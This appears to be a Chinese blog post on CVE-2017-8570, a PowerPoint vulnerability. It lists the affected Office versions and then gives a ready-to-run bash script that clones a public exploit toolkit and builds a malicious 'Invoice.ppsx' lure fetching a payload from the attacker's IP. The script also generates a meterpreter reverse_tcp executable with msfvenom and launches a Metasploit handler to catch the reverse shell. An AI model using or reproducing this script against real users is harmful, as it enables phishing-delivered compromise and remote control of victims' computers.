CVE-2017-8570 自动化

   · ☕ 1 分钟
🏷️
  • #CVE
  • CVE-2017-8570是一个PowerPoint演示文稿的漏洞,利用方法简单且危害较大。攻击者只需要将生成的恶意ppsx(ppsx是office2007版以后的演示文稿的保存格式)文档发送给用户,用户打开放映后就会中招。

    影响版本

    影响范围:

    1
    2
    3
    4
    5
    6
    7
    8
    
    Microsoft Office 2007 Service Pack 3
    Microsoft Office 2010 Service Pack 2 (32-bit editions)
    Microsoft Office 2010 Service Pack 2 (64-bit editions)
    Microsoft Office 2013 RT Service Pack 1
    Microsoft Office 2013 Service Pack 1 (32-bit editions)
    Microsoft Office 2013 Service Pack 1 (64-bit editions)
    Microsoft Office 2016 (32-bit edition)
    Microsoft Office 2016 (64-bit edition)
    

    自动化脚本

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    
    attack_ip="192.168.1.212"
    LPORT="6666"
    DIR="/var/cve2017"
    
    if [ -d ${DIR} ]; then
        rm -rf ${DIR}
        mkdir ${DIR}
    else
        mkdir ${DIR}
    fi
    cd $DIR
    `git clone https://github.com/tezukanice/Office8570.git`
    cd Office8570
    mkdir template
    mv template.ppsx template/template.ppsx
    python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://$attack_ip"/logo.doc"
    `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${attack_ip} LPORT=${LPORT} -f exe > ${DIR}/shell.exe`
    
    gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe"
    
    `service postgresql start`
    if [ -f "exp.rc" ]; then
        rm "exp.rc"
    fi
    echo "use exploit/multi/handler">>exp.rc
    echo "set LHOST "$attack_ip>>exp.rc
    echo "set LPORT "$LPORT>>exp.rc
    echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp">>exp.rc
    echo "exploit">>exp.rc
    gnome-terminal -e "msfconsole -r exp.rc"
    

    参考链接

    1. https://github.com/tezukanice/Office8570
    2. https://xz.aliyun.com/t/3772
    3. https://github.com/Drac0nids/CVE-2017-8570
    您的鼓励是我最大的动力
    alipay QR Code
    wechat QR Code

    目录